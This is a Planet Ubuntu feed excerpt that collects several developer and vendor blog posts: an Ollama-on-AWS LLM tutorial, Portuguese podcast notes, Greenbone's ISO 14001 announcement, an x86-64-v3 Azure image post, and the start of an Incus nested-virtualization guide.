<p>The demos will showcase some of Ubuntu Core’s key features including over-the-air (OTA) updates, secure boot and full disk encryption. We’ll also demonstrate how you might use Ubuntu Core as your operating system for smart home, robotics and automotive devices.</p>
<h1 class="wp-block-heading">Let’s keep in touch </h1>
<p>Your learning journey doesn’t end at Embedded World. Discover more about defining your software stack for embedded devices in our latest whitepaper.</p>
<figure class="wp-block-image"><a href="https://ubuntu.com/engage/software-defined-iot">
<div class="lazyload">
<noscript>
<img alt="" height="200" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_600,h_200/https://ubuntu.com/wp-content/uploads/a638/image.png" width="600" />
</noscript>
</div>
</a></figure>
<p>Which embedded Linux distribution should you choose? In this <a href="https://ubuntu.com/engage/embedded-linux-yocto-ubuntu-core-whitepaper">whitepaper</a>, we discuss how Yocto and Ubuntu Core solve the most pressing challenges facing any developer working on an embedded device: board bring-up, maintenance, updates, security, and many more to help you decide whether you should make or buy your operating system.</p>Ubuntu developershttp://planet.ubuntu.com/Podcast Ubuntu Portugal: E292 O Nabo Da Casahttps://media.blubrry.com/ubuntupt/archive.org/download/pup-e292/e292.mp32024-03-28T00:00:00+00:00<p>O que acontece quando um <em>mindset</em> positivo de crescimento inamovível colide com actualizações de Firefox em movimento? Serão os extraterrestres responsáveis pela construção das pirâmides, pregarem partidas nos caracteres UTF-16 ou desligarem optimizações em telefones? Pode-se partir um snap em dois, sem que voem estilhaços? Teremos de voltar às clássicas agendas de bolso em papel, ou a tecnologia FLOSS está aí para nos ajudar? A expressão "<em>ter Raspberry Pi’s a mais</em>" é mito ou realidade? O consumo e tráfico de drogas pode ser uma carreira alternativa a arranjar chatices com <em>software</em>? Não temos a certeza de termos respostas a estas perguntas…</p>
<p>Já sabem: oiçam, subscrevam e partilhem!</p>
<ul>
<li>
<p><a href="https://lovelynightowl.com">https://lovelynightowl.com</a></p>
</li>
<li>
<p><a href="https://mauser.pt/catalog/index.php?cPath=1667_2620_1672">https://mauser.pt/catalog/index.php?cPath=1667_2620_1672</a></p>
</li>
<li>
<p><a href="https://www.youtube.com/watch?v=5QczdJrkamQ">https://www.youtube.com/watch?v=5QczdJrkamQ</a></p>
</li>
<li>
<p><a href="https://www.twitch.tv/dmconstantino">https://www.twitch.tv/dmconstantino</a></p>
</li>
<li>
<p><a href="https://wikimedia.pt/eventos/wikicon-portugal-2024">https://wikimedia.pt/eventos/wikicon-portugal-2024</a></p>
</li>
<li>
<p><a href="https://drupaliberia.eu">https://drupaliberia.eu</a></p>
</li>
<li>
<p><a href="https://lisbon.globalappsec.org">https://lisbon.globalappsec.org</a></p>
</li>
<li>
<p><a href="https://discourse.ubuntu.com/t/call-for-volunteers-ubucon-north-america-2024/41470">https://discourse.ubuntu.com/t/call-for-volunteers-ubucon-north-america-2024/41470</a></p>
</li>
<li>
<p><a href="https://loco.ubuntu.com/teams/ubuntu-pt/">https://loco.ubuntu.com/teams/ubuntu-pt/</a></p>
</li>
<li>
<p><a href="https://shop.nitrokey.com/shop?aff_ref=3">https://shop.nitrokey.com/shop?aff_ref=3</a></p>
</li>
<li>
<p><a href="https://masto.pt/@pup">https://masto.pt/@pup</a></p>
</li>
<li>
<p><a href="https://youtube.com/PodcastUbuntuPortugal">https://youtube.com/PodcastUbuntuPortugal</a></p>
</li>
</ul>
<h3 id="apoios">Apoios</h3>
<p>Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal.
E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8.
Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem.
Se estiverem interessados em outros bundles não listados nas notas usem o link <a href="https://www.humblebundle.com/?partner=PUP">https://www.humblebundle.com/?partner=PUP</a> e vão estar também a apoiar-nos.</p>
<h3 id="atribuição-e-licenças">Atribuição e licenças</h3>
<p>Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo <a href="https://senhorpodcast.pt/">Senhor Podcast</a>.
O website é produzido por Tiago Carrondo e o <a href="https://gitlab.com/podcastubuntuportugal/website">código aberto</a> está licenciado nos termos da <a href="https://gitlab.com/podcastubuntuportugal/website/main/LICENSE">Licença MIT</a>.
A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da <a href="https://creativecommons.org/publicdomain/zero/1.0/">CC0 1.0 Universal License</a>.
Este episódio e a imagem utilizada estão licenciados nos termos da licença: <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/">Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)</a>, <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode">cujo texto integral pode ser lido aqui</a>. Estamos abertos a licenciar para permitir outros tipos de utilização, <a href="https://podcastubuntuportugal.org/contactos">contactem-nos</a> para validação e autorização.</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Generative AI with Ubuntu on AWS. Part II: Text generationhttps://ubuntu.com//blog/genai-on-ubuntu-on-aws-text-generation2024-03-27T15:09:40+00:00<p><em>In our </em><a href="https://ubuntu.com/blog/genai-on-ubuntu-on-aws-image-generation"><em>previous post</em></a><em>, we discussed how to generate Images using Stable Diffusion on AWS. In this post, we will guide you through running LLMs for text generation in your own environment with a GPU-based instance in simple steps, empowering you to create your own solutions.</em> </p>
<p>Text generation, a trending focus in generative AI, facilitates a broad spectrum of language tasks beyond simple question answering. These tasks include content extraction, summary generation, sentiment analysis, text enhancement (including spelling and grammar correction), code generation, and the creation of intelligent applications like chatbots and assistants.</p>
<p>In this tutorial, we will demonstrate how to deploy two prominent large language models (LLM) on a GPU-based EC2 instance on AWS (G4dn) using <a href="https://ollama.com/" rel="noreferrer noopener" target="_blank">Ollama</a>, an open source tool for downloading, managing, and serving LLM models. Before getting started, ensure you have completed our technical guide for <a href="https://canonical-aws.readthedocs-hosted.com/en/latest/aws-how-to/instances/install-nvidia-drivers/" rel="noreferrer noopener" target="_blank">installing NVIDIA drivers with CUDA on a G4DN instance</a>.</p>
<p>We will utilize <a href="https://llama.meta.com/llama2" rel="noreferrer noopener" target="_blank">Llama2</a> and <a href="https://mistral.ai/" rel="noreferrer noopener" target="_blank">Mistral</a>, both strong contenders in the LLM space with open source licenses suitable for this demo.</p>
<p>While we won’t explore the technical details of these models, it is worth noting that Mistral <a href="https://mistral.ai/news/announcing-mistral-7b/" rel="noreferrer noopener" target="_blank">has shown impressive results</a> despite its relatively small size (7 billion parameters fitting into an 8GB VRAM GPU). Conversely, Llama2 provides a range of models for various tasks, all available under open source licenses, making it well-suited for this tutorial. </p>
<p>To experiment with question-answer models similar to ChatGPT, we will utilize the fine-tuned versions optimized for chat or instruction (Mistral-instruct and Llama2-chat), as the base models are primarily designed for text completion.</p>
<p>Let’s get started!</p>
<h2 class="wp-block-heading">Step 1: Installing Ollama</h2>
<p>To begin, open an SSH session to your G4DN server and verify the presence of NVIDIA drivers and CUDA by running:</p>
<pre class="wp-block-code"><code><code>nvidia-smi</code></code></pre>
<p>Keep in mind that you need to have the SSH port open, the key-pair created or assigned to the machine during creation, the external IP of the machine, and software like <code>ssh</code> for Linux or PuTTY for Windows to connect to the server.</p>
<p>If the drivers are not installed, refer to our technical guide on <a href="https://canonical-aws.readthedocs-hosted.com/en/latest/aws-how-to/instances/install-nvidia-drivers/" rel="noreferrer noopener" target="_blank">installing NVIDIA drivers with CUDA on a G4DN instance</a>.</p>
<p>Once you have confirmed the GPU drivers and CUDA are set up, proceed to install Ollama. You can opt for a quick installation using their binary, or choose to clone the repository for a <a href="https://github.com/ollama/ollama/blob/main/docs/linux.md" rel="noreferrer noopener" target="_blank">manual installation</a>.</p>
<p>To install Ollama quickly, run the following command</p>
<pre class="wp-block-code"><code>curl -fsSL https://ollama.com/install.sh | sh</code></pre>
<h2 class="wp-block-heading">Step 2: Running LLMs on Ollama</h2>
<p>Let’s start with Mistral models and view the results by running:</p>
<pre class="wp-block-code"><code>ollama run mistral</code></pre>
<p>This instruction will download the Mistral model (4.1GB) and serve it, providing a prompt for immediate interaction with the model.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/fl-CU72xnqdUmIlstlbC16YA561D2EZfK714dc4MvntLxCtX_EacdmKgav4K4JitGJQ7LMXY_96A2r1eytxylAQb6A_imPxLxGuQ4x0TKzIhIc_wp2loejq6ZtIDw0POP0mnCvipQn2QrnwFN3Ke50s" width="720" />
</noscript>
</div>
</figure>
<p>Not a bad response for a prompt written in Spanish!. Now let’s experiment with a prompt to write code:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/qsCzgWB_Oa5jI9aiQeSQw3Y3AM6vwtp-pH5ZPGUHuLlDutELXtz10q2CVcUD5UfUQFGanO1dVesVpPBVNyWTZoA1mtGrd4Bc5S1D5KGIx40niOpZBTd1b6dYCWdVSWc2jsoBwKcpdzK-olGLNV8FnUw" width="720" />
</noscript>
</div>
</figure>
<p>Impressive indeed. The response is not only generated rapidly, but the code also runs flawlessly, with basic error handling and explanations. (Here’s a pro tip: consider asking for code comments, docstrings, and even test functions to be incorporated into the code). </p>
<p>Exit with the <code>/bye</code> command.</p>
<p>Now, let’s enter the same prompt with Llama2.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/khde_aa7oD1YCNZCqHfr3BImnx9DljC6LRQWYsY-h2QQqB1X-biwirAHc5UXKqvBbGj6IkMVGxIgJBgkg2G2zNuAmGFy6yiqJktNFV3noMky-lDdpV9fK0Hi3rKVPuCEU-2EU5JO_aogYR4rm5atr_U" width="720" />
</noscript>
</div>
</figure>
<p>We can see that there are immediate, notable differences. This may be due to the training data it has encountered, as it defaulted to a playful and informal chat-style response. </p>
<p>Let’s try Llama2 using the same code prompt from above:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/EJbcqAPT0KnCLdhkEHAYyV-GoQF9tFq7HD6oUW9bL1jdXRhK6ePMpBzsya-riGc-oUuU6YJnju8p6rENuvAvWwdFhXW1DHguSIepqoUyhEs53_J6ErA1MYZQ4chicB4NQ4yYcbVTzK7xIe2YtLlklxE" width="720" />
</noscript>
</div>
</figure>
<p>The results of this prompt are quite interesting. Following four separate tests, it was clear that the generated responses had not only broken code but also inconsistencies within the responses themselves. It appears that writing code is not one of the out-of-the-box capabilities of Llama2 in this variant (7b parameters, although there are also versions specialized in code like Code-Llama2), but results may vary.</p>
<p>Let’s run a final test with <a href="https://huggingface.co/blog/codellama" rel="noreferrer noopener" target="_blank">Code-Llama</a>, a Llama model fine-tuned to create and explain code:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/Pb-OFsqzSSwjNvwjRvunNOOVom24QlKI0Qj7AUbI99DuDAkseozB907EB6Q7UCwBJKjq-Qkj7a470lG6d30cKCvJYjJsnKvurJ0HxhJLcT2C77Vu3ceqW9-FBmqgBiTa9ndMrxHh0sjlw3c4SoenBIw" width="720" />
</noscript>
</div>
</figure>
<p>We will use the same prompt from above to write the code:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/rjAusR9z9VY8UZ5qHbJpaGVBMKgMvf7uLlunmtarEJRUbyL7ZyHnx_EUyRzSYJKeLrD8wPqz0VURJY28lyusU3Q9MBZFrxWUBWYa6TUQXw-Qg0uqSz2x8vEv52RDsykWMbr5WC7VNbiBZM_0OGiRO-o" width="720" />
</noscript>
</div>
</figure>
<p>This time, the response is improved, with the code functioning properly and a satisfactory explanation provided.</p>
<p>You now have the option to either continue exploring directly through this interface or start developing apps using the <a href="https://github.com/ollama/ollama/blob/main/docs/api.md" rel="noreferrer noopener" target="_blank">API</a>.</p>
<h2 class="wp-block-heading">Final test: A chat-like web interface</h2>
<p>We now have something ready for immediate use. However, for some added fun, let’s install a chat-like web interface to mimic the experience of ChatGPT.</p>
<p>For this test, we are going to use ollama-ui (<a href="https://github.com/ollama-ui/ollama-ui" rel="noreferrer noopener" target="_blank">https://github.com/ollama-ui/ollama-ui</a>). </p>
<p>⚠︎ <em>Please note that this project is no longer being maintained and users should transition to <a href="https://github.com/open-webui/open-webui" rel="noreferrer noopener" target="_blank">Open WebUI</a>, but for the sake of simplicity, we are going to still use the Ollama-ui front-end.</em></p>
<p>In your terminal window, clone the ollama-ui repository by entering the following command:</p>
<pre class="wp-block-code"><code>git clone https://github.com/ollama-ui/ollama-ui</code></pre>
<p>Here’s a cool trick: when you run Ollama, it creates an API endpoint on port 11434. However, Ollama-ui will run and be accessible on port 8000, thus, we’ll need to ensure both ports are securely accessible from our machine.</p>
<p>Since we are currently running as a development service (without the security features and performance of a production web server), we will establish an SSH tunnel for both ports. This setup will enable us to access these ports exclusively from our local computer with encrypted communication (SSL).</p>
<p>To create the tunnel for both the web-ui and the model’s API, close your current SSH session and open a new one with the following command:</p>
<pre class="wp-block-code"><code>ssh -L 8000:localhost:8000 -L 11434:127.0.0.1:11434 -i myKeyPair.pem ubuntu@<Machine_IP></code></pre>
<p>Once the tunnel is set up, navigate to the ollama-ui directory in a new terminal and run the following command:</p>
<pre class="wp-block-code"><code>cd ollama-ui<br />make</code></pre>
<p>Next, open your local browser and go to 127.0.0.1:8000 to enjoy the chat web inRunning an LLM model for text generation on Ubuntu on AWS with a GPU instanceterface!</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/uLI_zjL4X2QaaMudOr0_orYlhCqA3zgIGqrvJ5v4QDeiKKy2Yp6TjMDRB189jPNwLJjWBtLUcYWLgdlSiEpvwNkJr9jxmF0sfTpf4Y_nhx6QsNcQPmgs0resb2PtE6kN591MkQ1dN-1O2cKLyO9NLnQ" width="720" />
</noscript>
</div>
</figure>
<p>While the interface is simple, it enables dynamic model switching, supports multiple chat sessions, and facilitates interaction beyond reliance on the terminal (aside from tunneling). This offers an alternative method for testing the models and your prompts.</p>
<h2 class="wp-block-heading">Final thoughts</h2>
<p>Thanks to Ollama and how simple it is to install the NVIDIA drivers on a GPU-based instance, we got a very straightforward process for running LLMs for text generation in your own environment. Additionally, Ollama facilitates the creation of custom model versions and fine-tuning, which is invaluable for developing and testing LLM-based solutions.</p>
<p>When selecting the appropriate model for your specific use case, it is crucial to evaluate their capabilities based on architectures and the data they have been trained on. Be sure to explore fine-tuned variants such as Llama2 for code, as well as specialized versions tailored for generating Python code.</p>
<p>Lastly, for those aiming to develop production-ready applications, remember to review the model license and plan for scalability, as a single GPU server may not suffice for multiple concurrent users. You may want to explore <a href="https://aws.amazon.com/bedrock/" rel="noreferrer noopener" target="_blank">Amazon Bedrock</a>, which offers easy access to various versions of these models through a simple API call or <a href="https://ubuntu.com/ai/mlops" rel="noreferrer noopener" target="_blank">Canonical MLOps</a>, an end-to-end solution for training and running your own ML models.</p>
<h2 class="wp-block-heading">Quick note regarding the model size</h2>
<p>The size of the model significantly impacts the production of better results. A larger model is more capable of reproducing better content (since it has a greater capacity to “learn”). Additionally, larger models offer a larger attention window (for “understanding” the context of the question), and allow more tokens as input (your instructions) and output (the response)</p>
<p>As an example, Llama2 offers three main model sizes regarding the parameter number: 7, 13, or 70 billion parameters. The first model requires a GPU with a minimum of 8GB of GPU RAM, whereas the second requires a minimum of 16GB of VRAM.</p>
<p>Let me share a final example:</p>
<p>I will request the 7B parameters version of Llama2 to proofread an incorrect version of this simple Spanish phrase, “¿Hola, cómo estás?”, which translates to “Hi, how are you?” in English. </p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/_ZKYLr9y74wKnd7ZXOIHEL_zOkWwzXkcVT6EIl_Dk7HCLlnATlU4HiEkRCfK8mOFcA-vtJzN1fEsXSqHgw2K9yXGau7S0DyMXonaNKQb5JldqLletBvoPjBpdB884cipxBer-QSm1kcsdq7cVGyV4DQ" width="720" />
</noscript>
</div>
</figure>
<p>I conducted numerous tests, all yielding incorrect results like the one displayed in the screenshot (where “óle” is not a valid word, and it erroneously suggests it means “hello”).</p>
<p>Now, let’s test the same example with Llama2 with 13 billion parameters:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/efiibK2R508IFhdRykchQzoN2C5ysEdtQsf28yovi_cZNqdF1MXVHzOdJWx2DEAwsbv423AolmzmtqsjaerdE4DlWbnIqUzfdUts9wPM84-34UGni_7CZFtCKKq2QWpCNJjQn5i44qbn8J8TwTO3v6c" width="720" />
</noscript>
</div>
</figure>
<p>While it failed to recognize that I intended to write “hola,” this outcome is significantly better as it added accents, question marks and detected that “ola” wasn’t the right word to use (if you are curious, it means “wave”) .</p>Ubuntu developershttp://planet.ubuntu.com/Greenbone All in Green: ISO 14001 Certificationhttps://www.greenbone.net/?p=405432024-03-27T14:55:02+00:00<div class="flex flex-grow flex-col max-w-full">
<div class="min-h-[20px] text-message flex flex-col items-start gap-3 whitespace-pre-wrap break-words [.text-message+&]:mt-5 overflow-x-auto">
<div class="markdown prose w-full break-words dark:prose-invert light">
<p>It doesn’t get any greener? Not at all! We have just completed certification of our environmental management system in accordance with ISO 14001. And we have realised: There is always room for getting “greener” – you just have to be committed and willing to drive this commitment forward in measurable progress.</p>
<p><img alt="Greenbone passes ISO 14001 Certification." class="alignnone wp-image-40548 size-full" height="450" src="https://www.greenbone.net/wp-content/uploads/Iso-14001-Blog.jpg" width="1050" /></p>
<p>The international standard ISO 14001 defines requirements that companies can use to achieve environmental goals and fulfil legal obligations. Because the environmental niche is different for every organisation, the standard does not specify absolute values and targets, but it does emphasise integration into quality management, C-level responsibility for environmental management and the elimination of ambiguity regarding environmental targets.</p>
<p><strong>Targets, objectives, key figures: A dry framework for green growth</strong></p>
<p>The current German version of the standard, DIN EN ISO 14001:2015, places particular emphasis on “environmental performance improvement” and its measurement using appropriate indicators. The ecological objectives thus relate to the upstream and downstream environmental impact of products and services as well as the consideration of opportunities and risks in day-to-day business. The whole process is to be set up as part of a continuous improvement process (CIP) so that the effects of each new measure can be monitored and adapted accordingly. With this certification, we are proud to be able to announce another important step towards a company that is not only “green” on the outside, in the company logo, but also on the inside.</p>
<p>Back in autumn 2023, when the “Environmental Management System” was introduced, it was clear to us: we may not be able to save the world, but every step in this direction is important to us! So, step by step, we started by collecting all aspects that could have an impact on the environment. After ranking the factors and prioritising them, eleven areas emerged in which Greenbone can become ecologically effective and active: Starting with electricity consumption, cooling servers, heating offices and dispatching goods, through to waste separation and the energy efficiency of our appliances.</p>
<p><strong>And again and again: measure…</strong></p>
<p>As a company that emphasises the realisation and clear presentation of objectives, Greenbone is already certified according to <a href="https://www.greenbone.net/en/blog/iso-certification/" rel="noopener" target="_blank">ISO 9001:2015 (quality management) and ISO 27001:2017 (information security)</a> as well as within the framework of <a href="https://www.greenbone.net/en/blog/tisax-certification/" rel="noopener" target="_blank">TISAX for the Information Security Management System (ISMS)</a>. For ISO 14001, we have concretised our objectives in clearly defined key performance indicators (KPIs) in order to make them available for subsequent measurements. This allows us to readjust existing measures and introduce further improvements. What initially sounds dry is already bearing its first “green” fruits</p>
<ul>
<li>Our electricity has been supplied entirely from renewable energy sources since the company was founded. Total consumption – including clients and servers – is set to be reduced by a further 3% in the near future.</li>
<li>Whenever we purchase new equipment, we pay particular attention to sustainability and energy efficiency.</li>
<li>Since 2020, we have only used electric cars as company vehicles.</li>
<li>We have switched to digital payroll accounting.</li>
<li>The server room is regularly checked for potential savings.</li>
<li>We also prioritise environmental protection on a small scale: Waste is only collected centrally and packaging material is reused as a matter of principle.</li>
</ul>
<p>To make our ecological progress even more sustainable, we keep up to date with regular internal training courses on energy efficiency. In this way, we are helping to make the world even “greener” outside of Greenbone.</p>
<p>
</p><div class="hr av-1ddswlt-93c4782ac74f531d7189d494a9a04737 hr-invisible avia-builder-el-0 el_before_av_buttonrow avia-builder-el-first "><span class="hr-inner "><span class="hr-inner-style"></span></span></div> <div class="avia-buttonrow-wrap av-vqje4x-da998fe7aa00e0104196fad110497ace avia-buttonrow-center avia-builder-el-1 el_after_av_hr avia-builder-el-last ">
<a class="avia-button av-kx79twwb-1c09c8c56c0152ff288ee4a4ef9fd389 avia-icon_select-yes-left-icon avia-size-medium avia-color-theme-color-highlight" href="https://www.greenbone.net/en/contact/"><span class="avia_button_icon avia_button_icon_left "></span><span class="avia_iconbox_title">Contact</span></a>
<a class="avia-button av-kx79z1a6-873a7764d55d4721d4d38570b8d4cadd avia-icon_select-yes-left-icon avia-size-medium avia-color-theme-color-highlight" href="https://www.greenbone.net/en/testnow/"><span class="avia_button_icon avia_button_icon_left "></span><span class="avia_iconbox_title">Free Trial</span></a>
<a class="avia-button av-kx7a0678-58fdc263cf8c00ceb21355ee9025a8e5 avia-icon_select-yes-left-icon avia-size-medium avia-color-theme-color-highlight" href="https://www.greenbone.net/en/product-request/"><span class="avia_button_icon avia_button_icon_left "></span><span class="avia_iconbox_title">Buy Here</span></a>
<a class="avia-button av-kx7a0678-1-1c3b9175ad163e39606cdcd55873351b avia-icon_select-yes-left-icon avia-size-medium" href="https://www.greenbone.net/en/blog/"><span class="avia_button_icon avia_button_icon_left "></span><span class="avia_iconbox_title">Back to Overview</span></a> </div><p></p>
</div>
</div>
</div>Andreas Berglerhttps://www.greenbone.net/en/Ubuntu Blog: Profile workloads on x86-64-v3 to enable future performance gainshttps://ubuntu.com//blog/profile-workloads-on-x86-64-v3-to-enable-future-performance-gains2024-03-27T14:04:26+00:00<h1 class="wp-block-heading">Ubuntu 23.10 experimental image with x86-64-v3 instruction set now available on Azure</h1>
<p>Canonical is enabling enterprises to evaluate the performance of their most critical workloads in an experimental Ubuntu image on Azure compiled with x86-64-v3, which is a microarchitecture level that has the potential for performance gains. Developers can use this image to characterise workloads, which can help inform planning for a transition to x86-64-v3 and provide valuable input to the community working to make widespread adoption of x86-64-v3 a reality. </p>
<p>The x86-64-v3 instruction set enables hardware features that have been added by chip vendors since the original instruction set architecture (ISA) commonly known as x86-64-v1, x86-64, or amd64. Canonical Staff Engineer <a href="https://ubuntu.com/blog/optimising-ubuntu-performance-on-amd64-architecture">Michael Hudson-Doyle recently wrote about</a> the history of the x86-64/amd64 instruction sets, what these v1 and v3 microarchitecture levels represent, and how Canonical is evaluating their performance. While fully backwards compatible, later versions of these feature groups are not available on all hardware, so when deciding on an ISA image you must choose to maximise the supported hardware or to get access to more recent hardware capabilities. Canonical plans to continue supporting x86-64-v1 as there is a significant amount of legacy hardware deployed in the field. However, we also want to enable users to take advantage of newer x86-64-v3 hardware features that provide the opportunity for performance improvements the industry isn’t yet capitalising on. </p>
<h2 class="wp-block-heading">Untapped performance and power benefits</h2>
<p>Intel and Canonical partner closely to ensure that Ubuntu takes full advantage of the advanced hardware features Intel silicon offers, and the Ubuntu image on Azure is an interim step towards giving the industry access to the capabilities of x86-64-v3 and understanding the benefits that it offers. Intel has made x86-64-v3 available since Intel Haswell was first announced a decade ago. Support in their low power processor family is more recent, arriving in the Gracemont microarchitecture which was first in the 12th generation of Intel Core processors. Similarly, AMD has had examples since 2015, and emulators such as QEMU have supported x86-64-v3 since 2022. Yet, with this broad base of hardware availability, distro support of the features in the x86-64-v3 microarchitecture level is not widespread. In the spirit of enabling Ubuntu everywhere and ensuring that users can benefit from the unique features on different hardware families, Canonical feels strongly about enabling a transition to x86-64-v3 while remaining committed to our many users on hardware that doesn’t support v3. x86-64-v3 is available in a significant amount of hardware, and provides the opportunity for performance improvements which are currently being left on the table. This is why we believe that v3 is the next logical microarchitecture level to offer in Ubuntu, and Michael’s blog post explains in greater detail why v3 should be chosen instead of v2 or v4.</p>
<h2 class="wp-block-heading">Not just a porting exercise</h2>
<p>The challenge with enabling the transition to v3 is that while we expect a broad range of performance improvements depending on the workload, the results are much more nuanced. From Canonical’s early benchmarking we see that certain workloads see significant benefit from the adoption of x86-64-v3; however there are outliers that regress and need further analysis.</p>
<p>Canonical continues to do benchmarking, with plans to evaluate different compilers, compiler parameters, and configurations of hostOS and guestOS. In certain cases, such as the Glibc Log2 benchmark, we have reproducibly seen up to a 60% improvement. On the other hand, we also see other benchmarks that regress significantly. When digging in, we found unexpected behaviour in the compiled code. For example, in one of the benchmarks we verified an excessive number of moves between registers, leading to much worse performance due to the increased latency. In another situation, we noticed a large code size increase, as enabling x86-64-v3 on optimised SSE code caused the compiler to expand it into 17x more instructions, due to a possible bug during the translation to VEX encoding. With community efforts, these outliers could be resolved. However, they will require interdisciplinary collaboration to do so. This also underscores the necessity of benchmarking different types of workloads, so that we can understand their specific performance and bottlenecks. That’s why we believe it’s important to enable workloads to run on Azure, so that a broader community can give feedback and enable further optimisation.</p>
<h2 class="wp-block-heading">Try Ubuntu 23.10 with x86-64-v3 on Azure today</h2>
<p>The community now has access to resources on Azure to easily evaluate the performance of x86-64-v3 for their workloads, so that they can understand the benefits of migrating and can identify where improvements are still required. What is being shared today is experimental and for evaluation and benchmarking purposes only, which means that it won’t receive security updates or other maintenance updates you would expect for an image you could use in production. When x86-64-v3 is introduced for production workloads there will be a benefit to being able to run both v3 and v1 depending on the workload and hardware available. As is usually the case, the answer to the question of whether to run on a v3 image or a v1 image is ‘it depends’. This image provides the tools to answer that cost, power, and performance optimisation problem. In addition to the availability of the cloud image on Azure, we’ve also <a href="https://discourse.ubuntu.com/t/trying-out-ubuntu-23-04-on-x86-64-v3-rebuild-for-yourself/40963">previously posted</a> on the availability of Ubuntu 23.04 rebuilt to target the x86-64-v3 microarchitecture level, and made available installer images from that archive. These are additional tools that the community can use to benchmark, when cloud environments can’t be targeted.</p>
<p>In order to access the image on Azure and use it, you can follow the instructions in <a href="https://discourse.ubuntu.com/t/trying-out-ubuntu-23-10-on-x86-64-v3-rebuild-on-azure/43668">our discourse post</a>. Please be sure to leave your feedback there, or <a href="https://ubuntu.com/contact-us">Contact us directly to discuss your use case</a>.</p>
<h2 class="wp-block-heading">Further reading</h2>
<ul>
<li><a href="https://ubuntu.com/blog/optimising-ubuntu-performance-on-amd64-architecture">Optimising Ubuntu performance on amd64 architecture</a></li>
<li><a href="https://discourse.ubuntu.com/t/trying-out-ubuntu-23-04-on-x86-64-v3-rebuild-for-yourself/40963">Trying out Ubuntu 23.04 on x86-64-v3 rebuild for yourself</a></li>
</ul>Ubuntu developershttp://planet.ubuntu.com/Simos Xenitellis: How to run an Incus VM inside an Incus VM (nested virtualization)https://blog.simos.info/?p=467372024-03-27T13:40:48+00:00<p><a href="https://linuxcontainers.org/incus/">Incus</a> is a manager for virtual machines (VM) and system containers. There is also <a href="https://discuss.linuxcontainers.org/">an Incus support forum</a>.</p>
<p>A <strong>virtual machine</strong> (VM) is an instance of an operating system that runs on a computer, along with the main operating system. A virtual machine uses hardware virtualization features for the separation from the main operating system. With virtual machines, the full operating system boots up in them. </p>
<p>A <strong>system container</strong> is an instance of an operating system that also runs on a computer, along with the main operating system. A system container, instead, uses security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as <em>software virtual machines</em>. System containers reuse the running Linux kernel of the host, therefore you can only have Linux system containers, <a href="https://images.linuxcontainers.org/">any Linux distribution</a>. </p>
<p>In this post we see how to create a VM with Incus, install Incus into that VM, and then create a VM through the <em><strong>inner Incus installation</strong></em>. This is also called <strong><em>nested virtualization</em></strong>. Incus works fine with nested virtualization. Any pitfalls arise from the settings of the host (BIOS/UEFI settings, host Linux kernel, etc). We’ll see these together, step by step.</p>
<h2 class="simpletoc-title">Table of Contents</h2>
<ul class="simpletoc-list">
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#configuring-your-hardware-for-virtualization">Configuring your hardware for virtualization</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#testing-your-host-for-virtualization">Testing your host for virtualization</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#testing-your-host-for-nested-virtualization">Testing your host for nested virtualization</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#launching-the-outer-incus-vm">Launching the outer Incus VM</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#conclusion">Conclusion</a>
</li></ul>
<h2 class="wp-block-heading" id="configuring-your-hardware-for-virtualization">Configuring your hardware for virtualization</h2>
